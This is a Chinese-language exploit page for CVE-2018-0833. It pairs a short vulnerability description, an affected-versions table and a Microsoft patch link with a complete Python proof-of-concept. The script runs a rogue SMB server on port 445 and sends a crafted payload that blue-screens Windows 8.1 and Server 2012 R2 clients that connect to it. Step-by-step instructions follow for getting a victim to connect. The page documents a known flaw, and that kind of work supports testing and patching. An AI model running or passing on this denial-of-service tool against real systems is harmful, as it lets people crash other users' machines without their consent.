CVE-2018-0833
描述
The Microsoft Server Message Block 2.0 and 3.0 (SMBv2/SMBv3) client in Windows 8.1 and RT 8.1 and Windows Server 2012 R2 allows a denial of service vulnerability due to how specially crafted requests are handled, aka "SMBv2/SMBv3 Null Dereference Denial of Service Vulnerability".
影响版本
Product | Version | Update | Edition | Tested |
---|---|---|---|---|
Windows 8.1 | :heavy_check_mark: | |||
Windows Rt 8.1 | ||||
Windows Server 2012 | R2 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0833
利用方式
测试系统Windows 8.1 x86
首先使用一台机器(测试使用的是kali)运行项目中的python脚本
# Exploit Title: Microsoft Windows SMB Client Null Pointer Dereference Denial of Service
# Date: 26/02/2018
# Exploit Author: Nabeel Ahmed
# Version: SMBv3
# Tested on: Windows 8.1 (x86), Windows Server 2012 R2 (x64)
# CVE : CVE-2018-0833
import SocketServer
from binascii import unhexlify
payload = '000000ecfd534d4241414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141'
class byebye(SocketServer.BaseRequestHandler):
def handle(self):
try:
print ("From:", self.client_address)
print ("[*]Sending Payload...")
self.request.send(unhexlify(payload))
except Exception:
print("BSoD Triggered on", self.client_address)
pass
SocketServer.TCPServer.allow_reuse_address = 1
launch = SocketServer.TCPServer(('', 445),byebye)
launch.serve_forever()
然后用windows 8.1 x86这台机器去访问运行脚本的机器\\192.168.1.8
,即可实现蓝屏
效果图如下